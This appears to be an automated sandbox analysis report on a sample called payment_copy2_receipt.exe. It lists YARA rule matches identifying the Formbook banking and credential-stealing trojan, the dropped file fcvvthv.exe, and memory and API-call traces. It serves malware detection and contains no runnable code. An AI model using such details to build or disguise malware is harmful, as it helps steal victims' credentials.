Code function: 0_2_00405125 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405125

E-Banking Fraud

Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: initial sample

Static PE information: Filename: payment_copy2_receipt.exe

Source: payment_copy2_receipt.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: fcvvthv.exe PID: 2828, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: msdt.exe PID: 5440, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe

Code function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

0_2_0040324F

Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00406333		0_2_00406333
Source: C:\Users\user\Desktop\payment_copy2_receipt.exe	Code function: 0_2_00404936		0_2_00404936
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040B404		1_2_0040B404
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040C14D		1_2_0040C14D
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040B900		1_2_0040B900
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040BD18		1_2_0040BD18
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_0040C582		1_2_0040C582
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_004167FD		1_2_004167FD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00B80227		1_2_00B80227
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 1_2_00B804D8		1_2_00B804D8
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004012B0		3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0042127B		3_2_0042127B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00421AFB		3_2_00421AFB
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004012A5		3_2_004012A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00422BB0		3_2_00422BB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0040B462		3_2_0040B462
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0040B467		3_2_0040B467
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00422438		3_2_00422438
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004044C7		3_2_004044C7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004046E7		3_2_004046E7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0040FE97		3_2_0040FE97
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A820A0		3_2_00A820A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B220A8		3_2_00B220A8
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6B090		3_2_00A6B090
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B228EC		3_2_00B228EC
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2E824		3_2_00B2E824
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7A830		3_2_00A7A830
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B11002		3_2_00B11002
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A799BF		3_2_00A799BF
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A74120		3_2_00A74120
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A5F900		3_2_00A5F900
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B222AE		3_2_00B222AE
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B0FA2B		3_2_00B0FA2B
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A8EBB0		3_2_00A8EBB0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1DBD2		3_2_00B1DBD2
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B103DA		3_2_00B103DA
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B22B28		3_2_00B22B28
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A7AB40		3_2_00A7AB40
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6841F		3_2_00A6841F
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1D466		3_2_00B1D466
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A82581		3_2_00A82581
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A6D5E0		3_2_00A6D5E0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B225DD		3_2_00B225DD
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A50D20		3_2_00A50D20
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B22D07		3_2_00B22D07
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B21D55		3_2_00B21D55
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B22EF7		3_2_00B22EF7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A76E30		3_2_00A76E30
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B1D616		3_2_00B1D616
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B21FF1		3_2_00B21FF1
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00B2DFCE		3_2_00B2DFCE

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe

Code function: String function: 00A5B150 appears 72 times

Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041E037 NtClose,		3_2_0041E037
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041E0E7 NtAllocateVirtualMemory,		3_2_0041E0E7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004012B0 EntryPoint,NtProtectVirtualMemory,		3_2_004012B0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041DF07 NtCreateFile,		3_2_0041DF07
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041DFB7 NtReadFile,		3_2_0041DFB7
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004012A5 NtProtectVirtualMemory,		3_2_004012A5
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_004014E9 NtProtectVirtualMemory,		3_2_004014E9
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_0041DF01 NtCreateFile,		3_2_0041DF01
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A998F0 NtReadVirtualMemory,LdrInitializeThunk,		3_2_00A998F0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99860 NtQuerySystemInformation,LdrInitializeThunk,		3_2_00A99860
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99840 NtDelayExecution,LdrInitializeThunk,		3_2_00A99840
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A999A0 NtCreateSection,LdrInitializeThunk,		3_2_00A999A0
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99910 NtAdjustPrivilegesToken,LdrInitializeThunk,		3_2_00A99910
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99A20 NtResumeThread,LdrInitializeThunk,		3_2_00A99A20
Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exe	Code function: 3_2_00A99A00 NtProtectVirtualMemory,LdrInitializeThunk,		3_2_00A99A00
